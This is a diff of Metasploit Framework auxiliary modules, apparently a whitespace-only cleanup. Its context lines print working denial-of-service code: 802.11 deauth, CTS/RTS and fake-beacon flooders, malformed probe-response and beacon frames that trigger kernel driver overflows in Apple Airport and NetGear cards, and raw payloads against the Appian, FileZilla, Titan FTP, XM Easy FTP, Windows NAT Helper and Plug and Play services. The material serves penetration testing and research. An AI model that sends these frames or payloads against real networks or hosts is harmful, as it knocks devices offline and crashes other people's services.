# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info ={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless CTS/RTS Flooder',
|
||||
'Description' => %q{
|
||||
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
|
||||
using the specified source address,
|
||||
using the specified source address,
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'Brad Antoniewicz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
@ -37,21 +48,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
when 'CTS'
|
||||
|
||||
frame =create_cts()
|
||||
else
|
||||
else
|
||||
print_status("No TYPE selected!!")
|
||||
return
|
||||
return
|
||||
end
|
||||
|
||||
open_wifi
|
||||
|
||||
open_wifi
|
||||
print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....")
|
||||
|
||||
datastore['NUM'].to_i.times do
|
||||
wifi.write(frame)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
def create_rts
|
||||
|
||||
|
||||
frame =
|
||||
"\xb4" + # Type/SubType
|
||||
"\x00" + # Flags
|
||||
@ -62,8 +73,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return frame
|
||||
end
|
||||
def create_cts
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\xc4" + # Type/SubType
|
||||
"\x00" + # Flags
|
||||
"\xff\x7f" + # Duration
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,21 +19,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
|
||||
'Description' => %q{
|
||||
The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
|
||||
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
|
||||
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
|
||||
mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
|
||||
to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
|
||||
that does not contain valid information element (IE) fields after the fixed-length header. The data
|
||||
following the fixed-length header is copied over internal kernel structures, resulting in memory
|
||||
that does not contain valid information element (IE) fields after the fixed-length header. The data
|
||||
following the fixed-length header is copied over internal kernel structures, resulting in memory
|
||||
operations being performed on attacker-controlled pointer values.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-5710'],
|
||||
['OSVDB', '30180'],
|
||||
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
@ -54,38 +54,38 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
open_wifi
|
||||
|
||||
|
||||
cnt = datastore['COUNT'].to_i
|
||||
|
||||
print_status("Creating malicious probe response frame...")
|
||||
print_status("Creating malicious probe response frame...")
|
||||
frame = create_frame()
|
||||
|
||||
|
||||
print_status("Sending #{cnt} frames...")
|
||||
cnt.times { wifi.write(frame) }
|
||||
end
|
||||
|
||||
|
||||
def create_frame
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
caps = [rand(65535)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x50" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
Rex::Text.rand_text(2) + # beacon interval
|
||||
Rex::Text.rand_text(2) # capabilities
|
||||
|
||||
|
||||
frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
|
@ -1,10 +1,21 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info ={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless DEAUTH Flooder',
|
||||
@ -12,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
This module sends 802.11 DEAUTH requests to a specific wireless peer,
|
||||
using the specified source address and source BSSID.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'Brad Antoniewicz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
@ -27,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
|
||||
print_status("Creating Deauth frame with the following attributes:")
|
||||
print_status("\tDST: #{datastore['ADDR_DST']}")
|
||||
print_status("\tSRC: #{datastore['ADDR_SRC']}")
|
||||
@ -41,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
wifi.write(create_deauth())
|
||||
end
|
||||
close_wifi
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def create_deauth
|
||||
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
seq = [rand(255)].pack('n')
|
||||
frame =
|
||||
"\xc0" + # Type/SubType
|
||||
"\x00" + # Flags
|
||||
@ -53,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
eton(datastore['ADDR_DST']) + # dst addr
|
||||
eton(datastore['ADDR_SRC']) + # src addr
|
||||
eton(datastore['ADDR_BSS']) + # BSSID
|
||||
seq + # sequence number
|
||||
seq + # sequence number
|
||||
"\x07\x00" # Reason Code (nonassoc. sta)
|
||||
return frame
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -20,18 +20,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless Fake Access Point Beacon Flood',
|
||||
'Description' => %q{
|
||||
This module can advertise thousands of fake access
|
||||
points, using random SSIDs and BSSID addresses. Inspired
|
||||
by Black Alchemy's fakeap tool.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm', 'kris katterjohn' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptInt.new('NUM', [false, "Number of beacons to send"]),
|
||||
@ -59,39 +59,39 @@ class Metasploit3 < Msf::Auxiliary
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
end
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x00\x05" + # capability flags
|
||||
|
||||
|
||||
# ssid tag
|
||||
"\x00" + ssid.length.chr + ssid +
|
||||
|
||||
|
||||
# supported rates
|
||||
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
||||
|
||||
|
||||
# current channel
|
||||
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
|
||||
|
||||
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
|
||||
|
||||
# traffic indication map
|
||||
"\x05" + "\x04" + "\x00\x01\x02\x20" +
|
||||
|
||||
|
||||
# country information
|
||||
"\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" +
|
||||
|
||||
|
||||
# erp information
|
||||
"\x2a" + "\x01" + "\x00" +
|
||||
|
||||
|
||||
# extended supported rates
|
||||
"\x32" + "\x04" + "\x12\x24\x60\x6c"
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,25 +17,25 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the NetGear MA521 wireless device
|
||||
driver under Windows XP. When a specific malformed frame (beacon or probe response)
|
||||
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
|
||||
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
|
||||
driver attempts to write to an attacker-controlled memory location. The vulnerability
|
||||
is triggered by an invalid supported rates information element.
|
||||
|
||||
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
|
||||
|
||||
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
|
||||
NetGear MA521 Cardbus adapter. A remote code execution module is also in development.
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['OSVDB', '30507'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
|
||||
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
|
||||
]
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ssid = Rex::Text.rand_text(6)
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x01\x00" + # capabilities
|
||||
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# channel IE
|
||||
"\x03" + "\x01" + channel.chr
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,39 +17,39 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the NetGear WG311v1 wireless device
|
||||
driver under Windows XP and 2000. A kernel-mode heap overflow occurs
|
||||
when malformed probe response frame is received that contains a long SSID field
|
||||
|
||||
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
|
||||
|
||||
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
|
||||
NetGear WG311v1 PCI card. A remote code execution module is also in development.
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
|
||||
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-6125'],
|
||||
['OSVDB', '30511'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
|
||||
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
|
||||
]
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
@ -78,15 +78,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def create_probe_response
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x50" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x01\x00" + # capabilities
|
||||
@ -99,10 +99,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# channel IE
|
||||
"\x03" + "\x01" + channel.chr
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,40 +19,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response',
|
||||
'Description' => %q{
|
||||
This module exploits a firmware-level vulnerability in a variety of
|
||||
This module exploits a firmware-level vulnerability in a variety of
|
||||
802.11b devices. This attack works by sending a probe response frame
|
||||
containing a NULL SSID information element to an affected device. This
|
||||
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
|
||||
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
|
||||
Orinoco, and the first generation of Airport cards).
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'],
|
||||
['WVE', '2006-0064']
|
||||
['WVE', '2006-0064']
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
open_wifi
|
||||
|
||||
|
||||
cnt = datastore['COUNT'].to_i
|
||||
|
||||
print_status("Creating malicious probe response frame...")
|
||||
print_status("Creating malicious probe response frame...")
|
||||
frame = create_frame()
|
||||
|
||||
|
||||
print_status("Sending #{cnt} frames...")
|
||||
cnt.times { wifi.write(frame) }
|
||||
end
|
||||
@ -61,21 +61,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
caps = [rand(65535)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x50" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
Rex::Text.rand_text(2) + # beacon interval
|
||||
Rex::Text.rand_text(2) + # capabilities
|
||||
[0, 0].pack('CC') # Type=SSID(0) Length=0
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless Test Module',
|
||||
'Description' => %q{
|
||||
This module is a test of the wireless packet injection system.
|
||||
Please see external/ruby-lorcon/README for more information.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
))
|
||||
end
|
||||
|
||||
def run
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,15 +17,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Appian Enterprise Business Suite 5.6 SP1 DoS',
|
||||
'Description' => %q{
|
||||
This module exploits a denial of service flaw in the Appian
|
||||
Enterprise Business Suite service.
|
||||
Enterprise Business Suite service.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'guiness.stout <guinness.stout@gmail.com>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
@ -37,17 +37,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Dec 17 2007'
|
||||
))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(5400),], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status('Connecting to the service...')
|
||||
connect
|
||||
|
||||
|
||||
# mod: randomize the static "saint" strings from the PoC - hdm
|
||||
|
||||
req =
|
||||
|
||||
req =
|
||||
"\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00" +
|
||||
@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
"\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33"+
|
||||
"\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00"+
|
||||
"\x00"
|
||||
|
||||
|
||||
print_status('Sending exploit...')
|
||||
sock.put(req)
|
||||
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',
|
||||
'Description' => %q{
|
||||
This module triggers a Denial of Service condition in the FileZilla FTP
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service',
|
||||
'Description' => %q{
|
||||
This module triggers a Denial of Service condition in the FileZilla FTP
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
|
||||
'Description' => %q{
|
||||
The Titan FTP server v6.26 build 630 can be DoS'd by
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'XM Easy Personal FTP Server 5.6.0 NLST DoS',
|
||||
'Description' => %q{
|
||||
This module is a port of shinnai's script. You need
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',
|
||||
'Description' => %q{
|
||||
You need a valid login to DoS this FTP server, but
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,14 +17,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Windows NAT Helper Denial of Service',
|
||||
'Description' => %q{
|
||||
This module exploits a denial of service vulnerability
|
||||
within the Internet Connection Sharing service in
|
||||
Windows XP.
|
||||
within the Internet Connection Sharing service in
|
||||
Windows XP.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'CVE', '2006-5614' ],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 26 2006'))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(53),], self.class)
|
||||
end
|
||||
|
||||
@ -46,14 +46,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"
|
||||
pkt << Rex::Text.rand_text_english(10) + "\x03"
|
||||
pkt << Rex::Text.rand_text_english(3)
|
||||
pkt << Rex::Text.rand_text_english(3)
|
||||
pkt << "\x00\x00\x01\x00\x01"
|
||||
|
||||
|
||||
print_status("Sending dos packet...")
|
||||
|
||||
|
||||
udp_sock.put(pkt)
|
||||
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -15,22 +15,22 @@ require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Plug and Play Service Registry Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a stack overflow in the Windows Plug
|
||||
and Play service. This vulnerability can be exploited on
|
||||
Windows 2000 without a valid user account. Since the PnP
|
||||
service runs inside the service.exe process, this module
|
||||
will result in a forced reboot on Windows 2000. Obtaining
|
||||
will result in a forced reboot on Windows 2000. Obtaining
|
||||
code execution is possible if user-controlled memory can
|
||||
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
|
||||
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
|
||||
},
|
||||
